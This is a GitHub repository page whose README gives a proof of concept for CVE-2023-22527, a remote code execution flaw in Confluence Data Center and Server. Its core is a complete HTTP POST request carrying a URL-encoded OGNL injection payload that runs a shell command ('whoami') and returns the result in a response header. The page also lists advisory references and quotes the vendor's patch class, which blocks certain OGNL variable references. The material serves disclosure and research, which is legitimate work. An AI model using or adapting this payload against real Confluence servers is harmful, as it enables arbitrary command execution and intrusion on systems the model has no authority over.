Skip to content
/ CVE-2023-22527_Confluence_RCE Public
forked from Avento/CVE-2023-22527_Confluence_RCE

CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC

0 stars 5 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

djerryz/CVE-2023-22527_Confluence_RCE

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
README.md
README.md
 
 

Repository files navigation

CVE-2023-22527 Confluence RCE

CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC

References

CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server | Atlassian Support | Atlassian Documentation

[CONFSERVER-93833] RCE (Remote Code Execution) in Confluence Data Center and Server - CVE-2023-22527 - Create and track feature requests for Atlassian products.

https://twitter.com/TheDFIRReport/status/1749066611678466205

Diff

image-20240117093518010

PoC

POST http://192.168.80.139:8090/template/aui/text-inline.vm HTTP/1.1
Host: 192.168.80.139:8090
Content-Length: 372
Content-Type: application/x-www-form-urlencoded
Connection: close

label=aaa%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.poc%5B0%5D%2C%7B%7D%29%2B%5Cu0027&poc=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%5Cu0027Cmd-Ret%5Cu0027%2C%28new+freemarker.template.utility.Execute%28%29%29.exec%28%7B%22whoami%22%7D%29%29

Keyword

Velocity

Patch

package com.atlassian.confluence.impl.struts;

import java.util.Set;
import ognl.Node;
import org.apache.struts2.ognl.StrutsOgnlGuard;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

public class ConfluenceOgnlGuard extends StrutsOgnlGuard {
    private static final Logger LOG = LoggerFactory.getLogger(ConfluenceOgnlGuard.class);
    private static final Set<String> BLOCKED_VAR_REFS = Set.of("#context", "#request", "#parameters", "#session", "#application", "#attr");

    public ConfluenceOgnlGuard() {
    }

    protected boolean skipTreeCheck(Node tree) {
        return false;
    }

    protected boolean checkNode(Node node) {
        return super.checkNode(node) || this.isBlockedVarRef(node);
    }

    protected boolean isBlockedVarRef(Node node) {
        String nodeClassName = node.getClass().getName();
        if ("ognl.ASTVarRef".equals(nodeClassName)) {
            String varRefValue = node.toString();
            if (BLOCKED_VAR_REFS.contains(varRefValue)) {
                if (!"#attr".equals(varRefValue)) {
                    LOG.warn("Expression contains blocked var ref [{}]", varRefValue);
                }

                return true;
            }
        }

        return false;
    }
}

About

CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published